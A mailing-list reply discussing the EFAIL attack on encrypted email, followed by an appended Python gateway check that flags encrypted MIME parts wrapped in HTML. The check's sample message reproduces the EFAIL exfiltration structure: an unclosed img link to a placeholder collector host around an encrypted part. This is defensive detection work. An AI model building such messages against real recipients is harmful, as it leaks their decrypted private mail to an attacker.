Quoting Martijn Brinkers via Users <users@lists.djigzo.com>:

> The vulnerability is that an attacker can create an email containing
> previously encrypted content which is then decrypted. The decrypted
> content however is embedded into a link (image, css etc.). If the
> mail client then tries to retrieve the remote link, it sends the URL
> (which contains part of the email). The attacker then retrieves the
> link and can extract the text.

Hm, ok. This will be an even more bogus attack I guess. I was
suspecting something like an advanced padding oracle attack used to
decrypt the message, but they simply trick the client to decrypt AND
send back the content.

HTML e-mail is a security nightmare, automatically loading external
content is even worse and encrypting the whole shit does not solve
the problem at all. So nothing really new in this case.

As stated here: https://www.efail.de/

What are the EFAIL attacks?
The EFAIL attacks break PGP and S/MIME email encryption by coercing
clients into sending the full plaintext of the emails to the attacker.

But at least for Thunderbird one has to alter the default setting to
automatically load external content.
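
Added example (not part of the thread and not Djigzo code): a gateway-side check for the message structure described above, where an encrypted MIME part sits next to HTML parts so that the decrypted text ends up inside a URL attribute. The function name, the reason labels and the sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_string

ENCRYPTED = {"application/pkcs7-mime", "application/x-pkcs7-mime",
             "multipart/encrypted"}
# URL-bearing attribute whose opening quote is still open when the part ends.
OPEN_URL_ATTR = re.compile(
    r"""\b(?:src|href|background)\s*=\s*(["'])(?:(?!\1).)*\Z""", re.I | re.S)


def wrapped_encrypted_parts(raw):
    """Return (content_type, reason) for encrypted parts with HTML siblings."""
    findings = []
    for box in message_from_string(raw).walk():
        if not box.is_multipart() or box.get_content_type() in ENCRYPTED:
            continue
        kids = box.get_payload()
        if not any(k.get_content_type() == "text/html" for k in kids):
            continue
        for i, kid in enumerate(kids):
            if kid.get_content_type() not in ENCRYPTED:
                continue
            reason = "html-sibling"
            if i and kids[i - 1].get_content_type() == "text/html":
                body = kids[i - 1].get_payload(decode=True) or b""
                if OPEN_URL_ATTR.search(body.decode("utf-8", "replace")):
                    reason = "open-url-attribute"
            findings.append((kid.get_content_type(), reason))
    return findings


# Constructed sample; the host name and the ciphertext are placeholders.
SAMPLE = """\
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/html

<img src="http://collector.example.invalid/
--B
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

PLACEHOLDER-CIPHERTEXT
--B
Content-Type: text/html

">
--B--
"""
```

A message whose only content is the encrypted part yields no findings; a gateway could quarantine or strip the HTML siblings when a finding is returned.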